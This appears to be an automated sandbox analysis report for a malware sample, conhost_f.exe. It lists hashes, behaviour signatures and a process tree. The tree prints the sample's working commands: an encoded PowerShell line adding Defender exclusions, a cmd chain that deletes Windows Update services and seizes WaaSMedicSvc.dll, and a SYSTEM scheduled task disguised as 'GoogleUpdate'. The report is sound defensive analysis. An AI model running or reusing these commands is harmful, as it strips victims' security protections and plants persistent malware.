Analysis
-
max time kernel
134s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
17-08-2022 19:43
Static task
static1
Behavioral task
behavioral1
Sample
conhost_f.exe
Resource
win7-20220812-en
General
-
Target
conhost_f.exe
-
Size
1.8MB
-
MD5
eecdf1e5eb81226c10e087d0f79de8f2
-
SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2
-
SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8
-
SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 3488 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1296 icacls.exe 3624 takeown.exe 3508 icacls.exe 2180 takeown.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
conhost_f.exeupdater.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation conhost_f.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 3508 icacls.exe 2180 takeown.exe 1296 icacls.exe 3624 takeown.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
updater.exedescription pid process target process PID 3488 set thread context of 3376 3488 updater.exe conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2544 sc.exe 1992 sc.exe 4388 sc.exe 4212 sc.exe 1624 sc.exe 1712 sc.exe 5060 sc.exe 4484 sc.exe 364 sc.exe 1804 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1988 reg.exe 1824 reg.exe 4116 reg.exe 644 reg.exe 1656 reg.exe 1996 reg.exe 3216 reg.exe 2828 reg.exe 2644 reg.exe 2560 reg.exe 2680 reg.exe 4740 reg.exe 2668 reg.exe 2152 reg.exe 3728 reg.exe 5036 reg.exe 5100 reg.exe 456 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.execonhost_f.exepowershell.exeupdater.exepid process 2404 powershell.exe 2404 powershell.exe 4580 conhost_f.exe 2832 powershell.exe 2832 powershell.exe 3488 updater.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.execonhost_f.exetakeown.exepowershell.exeupdater.exetakeown.exedescription pid process Token: SeDebugPrivilege 2404 powershell.exe Token: SeDebugPrivilege 4580 conhost_f.exe Token: SeTakeOwnershipPrivilege 3624 takeown.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 3488 updater.exe Token: SeTakeOwnershipPrivilege 2180 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
conhost_f.execmd.execmd.execmd.execmd.exeupdater.execmd.exedescription pid process target process PID 4580 wrote to memory of 1572 4580 conhost_f.exe cmd.exe PID 4580 wrote to memory of 1572 4580 conhost_f.exe cmd.exe PID 1572 wrote to memory of 2404 1572 cmd.exe powershell.exe PID 1572 wrote to memory of 2404 1572 cmd.exe powershell.exe PID 4580 wrote to memory of 4776 4580 conhost_f.exe cmd.exe PID 4580 wrote to memory of 4776 4580 conhost_f.exe cmd.exe PID 4776 wrote to memory of 1992 4776 cmd.exe sc.exe PID 4776 wrote to memory of 1992 4776 cmd.exe sc.exe PID 4776 wrote to memory of 364 4776 cmd.exe sc.exe PID 4776 wrote to memory of 364 4776 cmd.exe sc.exe PID 4776 wrote to memory of 1804 4776 cmd.exe sc.exe PID 4776 wrote to memory of 1804 4776 cmd.exe sc.exe PID 4776 wrote to memory of 4388 4776 cmd.exe sc.exe PID 4776 wrote to memory of 4388 4776 cmd.exe sc.exe PID 4776 wrote to memory of 4212 4776 cmd.exe sc.exe PID 4776 wrote to memory of 4212 4776 cmd.exe sc.exe PID 4776 wrote to memory of 2680 4776 cmd.exe reg.exe PID 4776 wrote to memory of 2680 4776 cmd.exe reg.exe PID 4776 wrote to memory of 456 4776 cmd.exe reg.exe PID 4776 wrote to memory of 456 4776 cmd.exe reg.exe PID 4580 wrote to memory of 220 4580 conhost_f.exe cmd.exe PID 4580 wrote to memory of 220 4580 conhost_f.exe cmd.exe PID 4776 wrote to memory of 1996 4776 cmd.exe reg.exe PID 4776 wrote to memory of 1996 4776 cmd.exe reg.exe PID 4776 wrote to memory of 5036 4776 cmd.exe reg.exe PID 4776 wrote to memory of 5036 4776 cmd.exe reg.exe PID 220 wrote to memory of 2752 220 cmd.exe schtasks.exe PID 220 wrote to memory of 2752 220 cmd.exe schtasks.exe PID 4776 wrote to memory of 4740 4776 cmd.exe reg.exe PID 4776 wrote to memory of 4740 4776 cmd.exe reg.exe PID 4776 wrote to memory of 3624 4776 cmd.exe takeown.exe PID 4776 wrote to memory of 3624 4776 cmd.exe takeown.exe PID 4776 wrote to memory of 3508 4776 cmd.exe icacls.exe PID 4776 wrote to memory of 3508 4776 cmd.exe icacls.exe PID 4776 wrote to memory of 1656 4776 cmd.exe reg.exe PID 4776 wrote to memory of 1656 4776 cmd.exe reg.exe PID 4776 wrote to memory of 5100 4776 cmd.exe reg.exe PID 4776 wrote to memory of 5100 4776 cmd.exe reg.exe PID 4776 wrote to memory of 1988 4776 cmd.exe reg.exe PID 4776 wrote to memory of 1988 4776 cmd.exe reg.exe PID 4776 wrote to memory of 2668 4776 cmd.exe reg.exe PID 4776 wrote to memory of 2668 4776 cmd.exe reg.exe PID 4776 wrote to memory of 1740 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 1740 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 4196 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 4196 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 904 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 904 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 2364 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 2364 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 2412 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 2412 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 5008 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 5008 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 4672 4776 cmd.exe schtasks.exe PID 4776 wrote to memory of 4672 4776 cmd.exe schtasks.exe PID 4580 wrote to memory of 716 4580 conhost_f.exe cmd.exe PID 4580 wrote to memory of 716 4580 conhost_f.exe cmd.exe PID 716 wrote to memory of 3488 716 cmd.exe updater.exe PID 716 wrote to memory of 3488 716 cmd.exe updater.exe PID 3488 wrote to memory of 5020 3488 updater.exe cmd.exe PID 3488 wrote to memory of 5020 3488 updater.exe cmd.exe PID 5020 wrote to memory of 2832 5020 cmd.exe powershell.exe PID 5020 wrote to memory of 2832 5020 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\conhost_f.exe"C:\Users\Admin\AppData\Local\Temp\conhost_f.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1992 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:364 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1804 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4388 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4212 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:2680 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:456 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:1996 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:5036 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:4740 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3624 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3508 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1656 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:5100 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1988 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:2668 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:1740
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:4196
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:904
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:2364
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:2412
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:5008
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:4672
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"3⤵
- Creates scheduled task(s)
PID:2752 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1964
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:1624 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1712 -
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:2544 -
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:5060 -
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:4484 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
PID:1824 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
PID:3216 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
PID:2828 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
PID:2644 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
PID:2560 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2152 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:3728 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:4116 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:644 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:4464
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:3964
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:3924
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:1916
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:1012
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:4520
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:4888
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵PID:3376
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "usrjhfjun"5⤵PID:4912
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize
1.8MB
MD5eecdf1e5eb81226c10e087d0f79de8f2
SHA19fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2
SHA2565ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8
SHA5122fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89
-
Filesize
1.8MB
MD5eecdf1e5eb81226c10e087d0f79de8f2
SHA19fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2
SHA2565ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8
SHA5122fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89